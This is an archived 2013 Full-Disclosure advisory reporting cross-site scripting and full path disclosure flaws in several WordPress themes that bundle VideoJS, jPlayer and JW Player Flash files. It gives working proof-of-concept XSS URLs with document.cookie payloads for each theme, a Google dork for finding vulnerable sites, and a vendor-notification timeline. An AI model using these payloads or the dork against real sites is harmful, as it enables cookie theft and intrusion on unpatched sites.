lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 16 May 2013 18:52:24 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>,
 "1337 Exploit DataBase" <mr.inj3ct0r@...il.com>
Subject: Multiple vulnerabilities in multiple themes for
	WordPress with VideoJS

Hello list!

These are Cross-Site Scripting and Full path disclosure vulnerabilities in 
multiple themes for WordPress with VideoJS. Earlier I've wrote about 
vulnerabilities in VideoJS (http://seclists.org/fulldisclosure/2013/May/21). 
This is popular video and audio player, which is used at hundreds thousands 
of web sites and in multiple web applications. Google dork for VideoJS shows 
446000 results and for WP themes with it shows 171000 (inurl:video-js.swf 
inurl:wp-content/themes/).

Among them are Covert VideoPress, Photolio, Source, Smartstart and Crius. 
But there are other vulnerable themes for WP with video-js.swf (these are 
free, commercial and custom themes), which can be found with above-mentioned 
Google dork. All developers of these plugins, the same as developers of all 
other web applications with VideoJS, need to update it in their software.

-------------------------
Affected products:
-------------------------

All versions of Covert VideoPress, Photolio, Source, Smartstart and Crius 
themes.

Vulnerable are web applications which are using VideoJS Flash Component 
3.0.2 and previous versions. Version VideoJS Flash Component 3.0.2 is not 
vulnerable to mentioned XSS hole, except XSS via JS callbacks (as it can be 
read in repository on github). Also there are bypass methods which work in 
the last version, but the developers haven't fixed them due to their low 
impact. So update to last version of VideoJS.swf.

----------
Details:
----------

Cross-Site Scripting (WASC-08):

There are themes with multiple flash media players: besides VideoJS they 
have jPlayer and JW Player. And such themes have all XSS and Content 
Spoofing vulnerabilities, which have jPlayer and JW Player (see my 
advisories for these flash applications).

Covert VideoPress:

http://site/wp-content/themes/covertvideopress/assets/video-js.swf?readyFunction=alert(document.cookie)

Photolio:

http://site/wp-content/themes/photolio/js/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

http://site/wp-content/themes/photolio/js/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

http://site/wp-content/themes/photolio/js/jwplayer/player.swf?playerready=alert(document.cookie)

http://site/wp-content/themes/photolio/js/jwplayer/video-js.swf?readyFunction=alert(document.cookie)

Source:

http://site/wp-content/themes/source/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

http://site/wp-content/themes/source/js/jplayer/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

http://site/wp-content/themes/source/js/video/video-js.swf?readyFunction=alert(document.cookie)

Smartstart:

http://site/wp-content/themes/smartstart/js/video-js.swf?readyFunction=alert(document.cookie)

Crius:

http://site/wp-content/themes/crius/js/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

http://site/wp-content/themes/crius/js/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

http://site/wp-content/themes/crius/js/player.swf?playerready=alert(document.cookie)

http://site/wp-content/themes/crius/js/video-js.swf?readyFunction=alert(document.cookie)

Full path disclosure (WASC-13):

All mentioned themes have FPD vulnerabilities in php-files (in index.php and 
others), which is typically for WP themes.

http://site/wp-content/themes/covertvideopress/

http://site/wp-content/themes/photolio/

http://site/wp-content/themes/source/

http://site/wp-content/themes/smartstart/

http://site/wp-content/themes/crius/

------------
Timeline:
------------ 

2013.02.07 - found XSS vulnerability.
2013.02.08 - informed developers of VideoJS about both vulnerabilities. They 
thanked and promised to fix it.
2013.02.23 - reminded VideoJS developers and asked for date of releasing the 
fix.
2013.03.09 - again reminded developers.
2013.03.26 - again reminded developers.
2013.04.08 - reminded developers on github and resent previous letter to 
Zencoder's developers (since Brightcove, which acquired Zencoder, ignored 
the hole for two months).
2013.04.08-30 - discussed with developers (on github and by e-mail). And 
made my own fix to force developers to fix the hole.
2013.04.30 - developers fixed XSS hole in VideoJS Flash Component 3.0.2 in 
source code on github.
2013.05.02 - developers compiled fixed version of swf (after my reminding) 
and uploaded to both repositories.
2013.05.02 - tested version 3.0.2 and found that developers haven't fixed 
the hole completely and informed them.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists